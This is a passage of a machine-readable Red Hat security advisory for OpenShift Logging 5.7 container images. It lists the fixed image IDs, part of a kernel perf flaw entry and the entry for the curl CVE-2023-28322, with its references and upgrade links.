"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event\u0027s read_size"
},
{
"acknowledgments": [
{
"names": [
"Hiroki Kurosawa",
"Daniel Stenberg"
]
}
],
"cve": "CVE-2023-28322",
"cwe": {
"id": "CWE-440",
"name": "Expected Behavior Violation"
},
"discovery_date": "2023-05-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2196793"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the Curl package. This issue may lead to unintended information disclosure by the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "curl: more POST-after-PUT confusion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-28322"
},
{
"category": "external",
"summary": "RHBZ#2196793",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2196793"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-28322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28322"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-28322",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28322"
},
{
"category": "external",
"summary": "https://curl.se/docs/CVE-2023-28322.html",
"url": "https://curl.se/docs/CVE-2023-28322.html"
}
],
"release_date": "2023-05-17T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
